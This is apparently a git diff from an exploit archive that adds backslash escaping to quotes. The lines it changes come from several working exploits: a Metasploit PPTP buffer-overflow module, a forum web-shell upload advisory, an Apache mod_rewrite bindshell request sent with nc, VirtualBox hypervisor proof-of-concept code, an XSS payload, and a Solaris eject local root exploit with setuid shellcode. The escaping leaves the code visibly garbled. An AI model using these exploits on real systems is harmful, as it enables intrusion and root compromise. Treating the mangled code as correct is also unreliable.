detect Poptop versions. @@ -32,40 +32,40 @@ class Metasploit3 < Msf::Exploit::Remote Using the current method of exploitation, our socket will be closed before we have the ability to run code, preventing the use of Findsock. }, - 'Author' => 'spoonm', - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'References' => + \'Author\' => \'spoonm\', + \'License\' => MSF_LICENSE, + \'Version\' => \'$Revision$\', + \'References\' => [ - ['CVE', '2003-0213'], - ['OSVDB', '3293'], - ['URL', 'http://securityfocus.com/archive/1/317995'], - ['URL', 'http://www.freewebs.com/blightninjas/'], + [\'CVE\', \'2003-0213\'], + [\'OSVDB\', \'3293\'], + [\'URL\', \'http://securityfocus.com/archive/1/317995\'], + [\'URL\', \'http://www.freewebs.com/blightninjas/\'], ], - 'Privileged' => true, - 'Payload' => + \'Privileged\' => true, + \'Payload\' => { # Payload space is dynamically determined - 'MinNops' => 16, - 'StackAdjustment' => -1088 + \'MinNops\' => 16, + \'StackAdjustment\' => -1088 }, - 'SaveRegisters' => [ 'esp' ], - 'Platform' => 'linux', - 'Arch' => ARCH_X86, - 'Targets' => + \'SaveRegisters\' => [ \'esp\' ], + \'Platform\' => \'linux\', + \'Arch\' => ARCH_X86, + \'Targets\' => [ - ['Linux Bruteforce', - { 'Bruteforce' => + [\'Linux Bruteforce\', + { \'Bruteforce\' => { - 'Start' => { 'Ret' => 0xbffffa00 }, - 'Stop' => { 'Ret' => 0xbffff000 }, - 'Step' => 0 + \'Start\' => { \'Ret\' => 0xbffffa00 }, + \'Stop\' => { \'Ret\' => 0xbffff000 }, + \'Step\' => 0 } } ], ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Apr 9 2003')) + \'DefaultTarget\' => 0, + \'DisclosureDate\' => \'Apr 9 2003\')) register_options( [ @@ -74,26 +74,26 @@ class Metasploit3 < Msf::Exploit::Remote register_advanced_options( [ - OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]), - OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]), - OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]), - OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]), - OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]), + OptInt.new(\"PreReturnLength\", [ true, \"Space before we hit the return address. Affects PayloadSpace.\", 220 ]), + OptInt.new(\"RetLength\", [ true, \"Length of returns after payload.\", 32 ]), + OptInt.new(\"ExtraSpace\", [ true, \"The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn\'t really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I\'ve had successful exploitation with this set to 154, but nothing over 128 is suggested.\", 0 ]), + OptString.new(\"Hostname\", [ false, \"PPTP Packet hostname\", \'\' ]), + OptString.new(\"Vendor\", [ true, \"PPTP Packet vendor\", \'Microsoft Windows NT\' ]), ], self.class) end # Dynamic payload space calculation def payload_space - datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i + datastore[\'PreReturnLength\'].to_i + datastore[\'ExtraSpace\'].to_i end def build_packet(length) - [length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') + - [1,0].pack('cc') + - [0].pack('n') + - [1,1,0,2600].pack('NNnn') + - datastore['Hostname'].ljust(64, "\x00") + - datastore['Vendor'].ljust(64, "\x00") + [length, 1, 0x1a2b3c4d, 1, 0].pack(\'nnNnn\') + + [1,0].pack(\'cc\') + + [0].pack(\'n\') + + [1,1,0,2600].pack(\'NNnn\') + + datastore[\'Hostname\'].ljust(64, \"\\x00\") + + datastore[\'Vendor\'].ljust(64, \"\\x00\") end def check @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote def brute_exploit(addrs) connect - print_status("Trying #{"%.8x" % addrs['Ret']}...") + print_status(\"Trying #{\"%.8x\" % addrs[\'Ret\']}...\") # Construct the evil length packet packet = build_packet(1) + payload.encoded + - ([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4)) + ([addrs[\'Ret\']].pack(\'V\') * (datastore[\'RetLength\'] / 4)) sock.put(packet) diff --git a/platforms/linux/webapps/10427.txt b/platforms/linux/webapps/10427.txt index e46beb1fc..07a5f3edc 100755 --- a/platforms/linux/webapps/10427.txt +++ b/platforms/linux/webapps/10427.txt @@ -16,17 +16,17 @@ | 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php | | -| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier" +| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click \"modfier\" | | -| 3-Now upload your shell in "php.jpg" format +| 3-Now upload your shell in \"php.jpg\" format | | -| 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell. +| 4-Finally do a right click in the icon situated in \"Apparence\" then copy the link of your shell. | [-]############################################################# | -|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's +|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim\'s | [-]############################################################# diff --git a/platforms/multiple/dos/2237.sh b/platforms/multiple/dos/2237.sh index c1c0ad960..cae6b5b7e 100755 --- a/platforms/multiple/dos/2237.sh +++ b/platforms/multiple/dos/2237.sh @@ -3,12 +3,12 @@ # Vulnerability discovered by Mark Dowd. # CVE-2006-3747 # -# by jack +# by jack # 2006-08-20 # # Thx to xuso for help me with the shellcode. # -# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not +# I suppose that you\'ve the \"RewriteRule kung/(.*) $1\" rule if not # you must recalculate adressess. # # Shellcode is based on Taeho Oh bindshell on port 30464 and modified @@ -19,26 +19,26 @@ # # Gulcas rulez :P -echo -e "mod_rewrite apache off-by-one overflow" -echo "by jack \n\n" +echo -e \"mod_rewrite apache off-by-one overflow\" +echo \"by jack \\n\\n\" if [ $# -ne 1 ] ; then - echo "Usage: $0 webserver" + echo \"Usage: $0 webserver\" exit fi host=$1 -echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\ -%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\ -%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\ -%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\ -%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\ -%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\ -%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\ -%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\ -%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\ -%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\ -Host: $host\r\n\r\n" | nc $host 80 +echo -ne \"GET /kung/ldap://localhost/`perl -e \'print \"%90\"x128\'`%89%e6\\ +%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\ +%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\ +%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\ +%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\ +%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\ +%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\ +%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\ +%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\ +%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\ +Host: $host\\r\\n\\r\\n\" | nc $host 80 # milw0rm.com [2006-08-21] diff --git a/platforms/multiple/dos/32208.txt b/platforms/multiple/dos/32208.txt index 0a1f6fd9c..aa2c13e88 100755 --- a/platforms/multiple/dos/32208.txt +++ b/platforms/multiple/dos/32208.txt @@ -38,7 +38,7 @@ targeted at server, desktop and embedded use. VirtualBox provides -among many other features- 3D Acceleration for guest machines through its Guest Additions. This feature allows guest machines to use -the host machine's +the host machine\'s GPU to render 3D graphics based on then OpenGL or Direct3D APIs. Multiple memory corruption vulnerabilities have been found in the code @@ -95,13 +95,13 @@ corruption vulnerabilities, as described below. [CVE-2014-0981] The first vulnerability is caused by a *design flaw* in Chromium. The Chromium server makes use -of "*network pointers*". As defined in Chromium's documentation, -'"Network pointers are +of \"*network pointers*\". As defined in Chromium\'s documentation, +\'\"Network pointers are simply memory addresses that reside on another machine.[...] The networking layer will then -take care of writing the payload data to the specified address."'[2] +take care of writing the payload data to the specified address.\"\'[2] -So the Chromium's server code, which runs in the context of the +So the Chromium\'s server code, which runs in the context of the VirtualBox hypervisor in the Host OS, provides a write-what-where memory corruption primitive *by design*, which @@ -110,9 +110,9 @@ data in the hypervisor process from within a virtual machine. This is the code of the vulnerable function [file -'src/VBox/GuestHost/OpenGL/util/net.c'], which can -be reached by sending a 'CR_MESSAGE_READBACK' message to the -'VBoxSharedCrOpenGL' service: +\'src/VBox/GuestHost/OpenGL/util/net.c\'], which can +be reached by sending a \'CR_MESSAGE_READBACK\' message to the +\'VBoxSharedCrOpenGL\' service: /----- @@ -139,12 +139,12 @@ crNetRecvReadback( CRMessageReadback *rb, unsigned int len ) -----/ -Note that 'rb' points to a 'CRMessageReadback' structure, which is fully +Note that \'rb\' points to a \'CRMessageReadback\' structure, which is fully controlled by the application running inside a VM that is sending OpenGL rendering commands to the Host side. -The 'len' parameter is also fully controlled from the Guest side, so -it's possible to: +The \'len\' parameter is also fully controlled from the Guest side, so +it\'s possible to: 1. decrement the value stored at any memory address within the address space of the hypervisor. @@ -154,13 +154,13 @@ the hypervisor. 7.2. *VirtualBox crNetRecvWriteback Memory Corruption Vulnerability* [CVE-2014-0982] The second vulnerability is closely related to the first -one, and it's also caused by Chromium's -"*network pointers*". +one, and it\'s also caused by Chromium\'s +\"*network pointers*\". This is the code of the vulnerable function [file -'src/VBox/GuestHost/OpenGL/util/net.c'], which can -be reached by sending a 'CR_MESSAGE_WRITEBACK' message to the -'VBoxSharedCrOpenGL' service: +\'src/VBox/GuestHost/OpenGL/util/net.c\'], which can +be reached by sending a \'CR_MESSAGE_WRITEBACK\' message to the +\'VBoxSharedCrOpenGL\' service: /----- @@ -178,10 +178,10 @@ crNetRecvWriteback( CRMessageWriteback *wb ) -----/ -Note that 'rb' points to a 'CRMessageWriteback' structure, which is +Note that \'rb\' points to a \'CRMessageWriteback\' structure, which is fully controlled by the application running inside a VM that is sending OpenGL rendering -commands to the Host side, so it's possible to +commands to the Host side, so it\'s possible to decrement the value stored at any memory address within the address space of the hypervisor. @@ -192,11 +192,11 @@ Vulnerability* [CVE-2014-0983] When an OpenGL application running inside a VM sends rendering commands (in the form of opcodes + data for those opcodes) through -a 'CR_MESSAGE_OPCODES' message, the Chromium server will handle them in -the 'crUnpack' function. -The code for the 'crUnpack' function is automatically generated by the +a \'CR_MESSAGE_OPCODES\' message, the Chromium server will handle them in +the \'crUnpack\' function. +The code for the \'crUnpack\' function is automatically generated by the Python script located -at 'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py'. +at \'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py\'. This function is basically a big switch statement dispatching different functions according to the opcode being processed: @@ -212,7 +212,7 @@ void crUnpack( const void *data, const void *opcodes, for (i = 0 ; i < num_opcodes ; i++) { - /*crDebug("Unpacking opcode \%d", *unpack_opcodes);*/ + /*crDebug(\"Unpacking opcode \\%d\", *unpack_opcodes);*/ switch( *unpack_opcodes ) { case CR_ALPHAFUNC_OPCODE: crUnpackAlphaFunc(); break; @@ -222,9 +222,9 @@ void crUnpack( const void *data, const void *opcodes, -----/ -When the opcode being processed is 'CR_VERTEXATTRIB4NUBARB_OPCODE' -('0xEA'), -the function to be invoked is 'crUnpackVertexAttrib4NubARB': +When the opcode being processed is \'CR_VERTEXATTRIB4NUBARB_OPCODE\' +(\'0xEA\'), +the function to be invoked is \'crUnpackVertexAttrib4NubARB\': /----- @@ -235,9 +235,9 @@ break; -----/ -The 'crUnpackVertexAttrib4NubARB' function reads 5 values from the +The \'crUnpackVertexAttrib4NubARB\' function reads 5 values from the opcode data sent by the Chromium client, -and just invokes 'cr_unpackDispatch.VertexAttrib4NubARB' with those 5 +and just invokes \'cr_unpackDispatch.VertexAttrib4NubARB\' with those 5 values as arguments: @@ -255,11 +255,11 @@ static void crUnpackVertexAttrib4NubARB(void) -----/ -'VertexAttrib4NubARB' is a function pointer in a dispatch table, and +\'VertexAttrib4NubARB\' is a function pointer in a dispatch table, and points to the function -'crServerDispatchVertexAttrib4NubARB', whose code is generated by the +\'crServerDispatchVertexAttrib4NubARB\', whose code is generated by the Python script located at -'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py': +\'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py\': /----- @@ -273,11 +273,11 @@ z, w ); -----/ -Note that the 'index' parameter, which is a 4-byte integer coming from +Note that the \'index\' parameter, which is a 4-byte integer coming from an untrusted source (the opcode data sent by the Chromium client from the VM), is used as an index within the -'cr_server.current.c.vertexAttrib.ub4' -array in order to write 'cr_unpackData' (which is a pointer to the +\'cr_server.current.c.vertexAttrib.ub4\' +array in order to write \'cr_unpackData\' (which is a pointer to the attacker-controlled opcode data), without validating that the index is within the bounds of the array. This issue can be leveraged to corrupt arbitrary memory with a pointer @@ -285,7 +285,7 @@ to attacker-controlled data. Also note that *the same vulnerability affects several functions* whose code is generated by the -'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py' +\'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py\' Python script: @@ -324,15 +324,15 @@ crServerDispatchVertexAttrib4sARB /----- -#include "stdafx.h" +#include \"stdafx.h\" #include -#include "vboxguest2.h" -#include "vboxguest.h" -#include "err.h" -#include "vboxcropenglsvc.h" -#include "cr_protocol.h" +#include \"vboxguest2.h\" +#include \"vboxguest.h\" +#include \"err.h\" +#include \"vboxcropenglsvc.h\" +#include \"cr_protocol.h\" -#define VBOXGUEST_DEVICE_NAME "\\\\.\\VBoxGuest" +#define VBOXGUEST_DEVICE_NAME \"\\\\\\\\.\\\\VBoxGuest\" HANDLE open_device(){ @@ -345,10 +345,10 @@ HANDLE open_device(){ NULL); if (hDevice == INVALID_HANDLE_VALUE){ - printf("[-] Could not open device %s .\n", VBOXGUEST_DEVICE_NAME); + printf(\"[-] Could not open device %s .\\n\", VBOXGUEST_DEVICE_NAME); exit(EXIT_FAILURE); } - printf("[+] Handle to %s: 0x%X\n", VBOXGUEST_DEVICE_NAME, hDevice); + printf(\"[+] Handle to %s: 0x%X\\n\", VBOXGUEST_DEVICE_NAME, hDevice); return hDevice; @@ -362,24 +362,24 @@ uint32_t do_connect(HANDLE hDevice){ memset(&info, 0, sizeof(info)); info.Loc.type = VMMDevHGCMLoc_LocalHost_Existing; - strcpy(info.Loc.u.host.achName, "VBoxSharedCrOpenGL"); + strcpy(info.Loc.u.host.achName, \"VBoxSharedCrOpenGL\"); rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CONNECT, &info, sizeof(info), &info, sizeof(info), &cbReturned, NULL); if (!rc){ - printf("ERROR: DeviceIoControl failed in function do_connect()! -LastError: %d\n", GetLastError()); + printf(\"ERROR: DeviceIoControl failed in function do_connect()! +LastError: %d\\n\", GetLastError()); exit(EXIT_FAILURE); } if (info.result == VINF_SUCCESS){ - printf("HGCM connect was successful: client id =0x%x\n", + printf(\"HGCM connect was successful: client id =0x%x\\n\", info.u32ClientID); } else{ //If 3D Acceleration is disabled, info.result value will be -2900. - printf("[-] HGCM connect failed. Result: %d (Is 3D Acceleration -enabled??)\n", info.result); + printf(\"[-] HGCM connect failed. Result: %d (Is 3D Acceleration +enabled??)\\n\", info.result); exit(EXIT_FAILURE); } return info.u32ClientID; @@ -393,20 +393,20 @@ void do_disconnect(HANDLE hDevice, uint32_t u32ClientID){ memset(&info, 0, sizeof(info)); info.u32ClientID = u32ClientID; - printf("Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\n"); + printf(\"Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\\n\"); rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_DISCONNECT, &info, sizeof(info), &info, sizeof(info), &cbReturned, NULL); if (!rc){ - printf("ERROR: DeviceIoControl failed in function -do_disconnect()! LastError: %d\n", GetLastError()); + printf(\"ERROR: DeviceIoControl failed in function +do_disconnect()! LastError: %d\\n\", GetLastError()); exit(EXIT_FAILURE); } if (info.result == VINF_SUCCESS){ - printf("HGCM disconnect was successful.\n"); + printf(\"HGCM disconnect was successful.\\n\"); } else{ - printf("[-] HGCM disconnect failed. Result: %d\n", info.result); + printf(\"[-] HGCM disconnect failed. Result: %d\\n\", info.result); exit(EXIT_FAILURE); } @@ -433,16 +433,16 @@ void set_version(HANDLE hDevice, uint32_t u32ClientID){ sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ - printf("ERROR: DeviceIoControl failed in function set_version()! -LastError: %d\n", GetLastError()); + printf(\"ERROR: DeviceIoControl failed in function set_version()! +LastError: %d\\n\", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ - printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); + printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned); } else{ - printf("Host didn't accept our version.\n"); + printf(\"Host didn\'t accept our version.\\n\"); exit(EXIT_FAILURE); } } @@ -466,16 +466,16 @@ void set_pid(HANDLE hDevice, uint32_t u32ClientID){ sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ - printf("ERROR: DeviceIoControl failed in function set_pid()! -LastError: %d\n", GetLastError()); + printf(\"ERROR: DeviceIoControl failed in function set_pid()! +LastError: %d\\n\", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ - printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); + printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned); } else{ - printf("Host didn't like our PID %d\n", GetCurrentProcessId()); + printf(\"Host didn\'t like our PID %d\\n\", GetCurrentProcessId()); exit(EXIT_FAILURE); } @@ -501,7 +501,7 @@ void trigger_message_readback(HANDLE hDevice, uint32_t u32ClientID){ *((DWORD *)&msg.readback_ptr.ptrSize) = 0x99999999; memcpy(&mybuf, &msg, sizeof(msg)); - strcpy(mybuf + sizeof(msg), "Hi hypervisor!"); + strcpy(mybuf + sizeof(msg), \"Hi hypervisor!\"); memset(&parms, 0, sizeof(parms)); parms.hdr.result = VERR_WRONG_ORDER; @@ -521,16 +521,16 @@ memcpy: sizeof(mybuf) - 0x18 sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ - printf("ERROR: DeviceIoControl failed in function -trigger_message_readback()!. LastError: %d\n", GetLastError()); + printf(\"ERROR: DeviceIoControl failed in function +trigger_message_readback()!. LastError: %d\\n\", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ - printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); + printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned); } else{ - printf("HGCM Call failed. Result: %d\n", parms.hdr.result); + printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result); exit(EXIT_FAILURE); } } @@ -553,7 +553,7 @@ void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){ *((DWORD *)msg.writeback.writeback_ptr.ptrSize) = 0xAABBCCDD; memcpy(&mybuf, &msg, sizeof(msg)); - strcpy(mybuf + sizeof(msg), "dummy"); + strcpy(mybuf + sizeof(msg), \"dummy\"); memset(&parms, 0, sizeof(parms)); parms.hdr.result = VERR_WRONG_ORDER; @@ -573,16 +573,16 @@ void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){ sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ - printf("ERROR: DeviceIoControl failed in function -trigger_message_writeback()! LastError: %d\n", GetLastError()); + printf(\"ERROR: DeviceIoControl failed in function +trigger_message_writeback()! LastError: %d\\n\", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ - printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); + printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned); } else{ - printf("HGCM Call failed. Result: %d\n", parms.hdr.result); + printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result); exit(EXIT_FAILURE); } @@ -646,16 +646,16 @@ negative index used to trigger the memory corruption sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL); if (!rc){ - printf("ERROR: DeviceIoControl failed in function -trigger_opcode_0xea()! LastError: %d\n", GetLastError()); + printf(\"ERROR: DeviceIoControl failed in function +trigger_opcode_0xea()! LastError: %d\\n\", GetLastError()); exit(EXIT_FAILURE); } if (parms.hdr.result == VINF_SUCCESS){ - printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned); + printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned); } else{ - printf("HGCM Call failed. Result: %d\n", parms.hdr.result); + printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result); exit(EXIT_FAILURE); } @@ -676,19 +676,19 @@ void poc(int option){ switch (option){ case 1: - printf("[1] triggering the first bug...\n"); + printf(\"[1] triggering the first bug...\\n\"); trigger_message_readback(hDevice, u32ClientID); break; case 2: - printf("[2] triggering the second bug...\n"); + printf(\"[2] triggering the second bug...\\n\"); trigger_message_writeback(hDevice, u32ClientID); break; case 3: - printf("[3] triggering the third bug...\n"); + printf(\"[3] triggering the third bug...\\n\"); trigger_opcode_0xea(hDevice, u32ClientID); break; default: - printf("[!] Unknown option %d.\n", option); + printf(\"[!] Unknown option %d.\\n\", option); } /* Disconnect from the VBoxSharedCrOpenGL service */ @@ -702,13 +702,13 @@ void poc(int option){ int main(int argc, char* argv[]) { if (argc < 2){ - printf("Usage: %s - - + + "<SCRIPT>alert(/BugReport.ir-XSS/.source)</SCRIPT> -
- - +
+ + ------------- #################### 4. Solution: diff --git a/platforms/solaris/local/197.c b/platforms/solaris/local/197.c index 1372f2ff8..2152e8930 100755 --- a/platforms/solaris/local/197.c +++ b/platforms/solaris/local/197.c @@ -26,23 +26,23 @@ #define NOP 0xac15a16e -#define VULPROG "/usr/bin/eject" +#define VULPROG \"/usr/bin/eject\" -char shellcode[] = /* from scz's funny shellcode for SPARC */ - "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* setuid(0) */ - "\xaa\x1d\x40\x15\x90\x05\x60\x01\x92\x10\x20\x09" /* dup2(1,2) */ - "\x94\x05\x60\x02\x82\x10\x20\x3e\x91\xd0\x20\x08" - "\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29" - "\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e" - "\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07" - "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" - "\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff"; +char shellcode[] = /* from scz\'s funny shellcode for SPARC */ + \"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\" /* setuid(0) */ + \"\\xaa\\x1d\\x40\\x15\\x90\\x05\\x60\\x01\\x92\\x10\\x20\\x09\" /* dup2(1,2) */ + \"\\x94\\x05\\x60\\x02\\x82\\x10\\x20\\x3e\\x91\\xd0\\x20\\x08\" + \"\\x20\\x80\\x49\\x73\\x20\\x80\\x62\\x61\\x20\\x80\\x73\\x65\\x20\\x80\\x3a\\x29\" + \"\\x7f\\xff\\xff\\xff\\x94\\x1a\\x80\\x0a\\x90\\x03\\xe0\\x34\\x92\\x0b\\x80\\x0e\" + \"\\x9c\\x03\\xa0\\x08\\xd0\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\\xc0\\x2a\\x20\\x07\" + \"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01\" + \"\\x91\\xd0\\x20\\x08\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\"; /* get current stack point address */ long get_sp(void) { - __asm__("mov %sp,%i0"); + __asm__(\"mov %sp,%i0\"); } /* prints a long to a string */ @@ -78,14 +78,14 @@ void create_shellbuf(char* shellbuf, int align, int retloc) /* check align parameter */ if (align < 0 || align > 3) { - printf("Error: align is %d, it should be between 0 and 3\n", align); + printf(\"Error: align is %d, it should be between 0 and 3\\n\", align); exit(1); } /* check retloc parameter */ if (contains_zero(retloc) || contains_zero(retloc+2) ) { - printf("Error: retloc (0x%x) or retloc+2 (0x%x) contains a zero byte\n", retloc, retloc+2); + printf(\"Error: retloc (0x%x) or retloc+2 (0x%x) contains a zero byte\\n\", retloc, retloc+2); exit(1); } @@ -127,7 +127,7 @@ void create_shellbuf(char* shellbuf, int align, int retloc) /* at this point the shell buffer should be exactly SHELL bytes long, including the null-terminator */ if (strlen(shellbuf) + 1 != SHELL) { - printf("Error: The shell buffer is %d bytes long. It should be %d bytes. Something went terribly wrong...\n", + printf(\"Error: The shell buffer is %d bytes long. It should be %d bytes. Something went terribly wrong...\\n\", strlen(shellbuf)+1, SHELL); exit(1); } @@ -145,32 +145,32 @@ void execute_vulnprog(char* pattern, char* shellbuf) /* create message files */ if (strlen(pattern) > 512) { - printf("Warning: The pattern is %d bytes long. Only the first 512 bytes will be used.\n", strlen(pattern)); + printf(\"Warning: The pattern is %d bytes long. Only the first 512 bytes will be used.\\n\", strlen(pattern)); } - if ( !(fp = fopen("messages.po", "w+")) ) { - perror("Error openning messages.po for writing."); + if ( !(fp = fopen(\"messages.po\", \"w+\")) ) { + perror(\"Error openning messages.po for writing.\"); exit(1); } - fprintf(fp, "domain \"messages\"\n"); - fprintf(fp, "msgid \"usage: %%s [-fndq] [name | nickname]\\n\"\n"); - fprintf(fp, "msgstr \"%s\\n\"", pattern); + fprintf(fp, \"domain \\\"messages\\\"\\n\"); + fprintf(fp, \"msgid \\\"usage: %%s [-fndq] [name | nickname]\\\\n\\\"\\n\"); + fprintf(fp, \"msgstr \\\"%s\\\\n\\\"\", pattern); fclose(fp); - system("/usr/bin/msgfmt messages.po"); - system("cp messages.mo SUNW_OST_OSCMD"); - system("cp messages.mo SUNW_OST_OSLIB"); + system(\"/usr/bin/msgfmt messages.po\"); + system(\"cp messages.mo SUNW_OST_OSCMD\"); + system(\"cp messages.mo SUNW_OST_OSLIB\"); /* prepere the environment for the VULNPROG process */ - env[0] = "NLSPATH=:."; + env[0] = \"NLSPATH=:.\"; env[1] = shellbuf; /* put the shellbuf in env */ env[2] = NULL; /* end of env */ /* execute the vulnerable program using our custom environment */ - execle(VULPROG, VULPROG, "-x", NULL, env); + execle(VULPROG, VULPROG, \"-x\", NULL, env); } @@ -178,18 +178,18 @@ void execute_vulnprog(char* pattern, char* shellbuf) void usage(char *prg) { - printf("Usage:\n"); - printf(" %s [command] [options]\n\n", prg); - printf("Commands:\n"); - printf(" dump Dumps the stack\n"); - printf(" shell Dumps the shell buffer\n"); - printf(" exploit Exploits /usr/bin/eject\n\n"); - printf("Options:\n"); - printf(" --num=96 Number of words to dump from the stack\n"); - printf(" --align=2 Sets the alignment (0, 1, 2 or 3)\n"); - printf(" --shellofs=-6 Offset of the shell buffer\n"); - printf(" --retlocofs=-4 Retloc adjustment (must be divisible by 4)\n"); - printf(" --retloc=0xeffffa3c Location of the return address\n"); + printf(\"Usage:\\n\"); + printf(\" %s [command] [options]\\n\\n\", prg); + printf(\"Commands:\\n\"); + printf(\" dump Dumps the stack\\n\"); + printf(\" shell Dumps the shell buffer\\n\"); + printf(\" exploit Exploits /usr/bin/eject\\n\\n\"); + printf(\"Options:\\n\"); + printf(\" --num=96 Number of words to dump from the stack\\n\"); + printf(\" --align=2 Sets the alignment (0, 1, 2 or 3)\\n\"); + printf(\" --shellofs=-6 Offset of the shell buffer\\n\"); + printf(\" --retlocofs=-4 Retloc adjustment (must be divisible by 4)\\n\"); + printf(\" --retloc=0xeffffa3c Location of the return address\\n\"); exit(0); } @@ -212,20 +212,20 @@ main(int argc, char **argv) usage(argv[0]); } - if (!strncmp(argv[1], "dump", 4)) { dump = 1; } 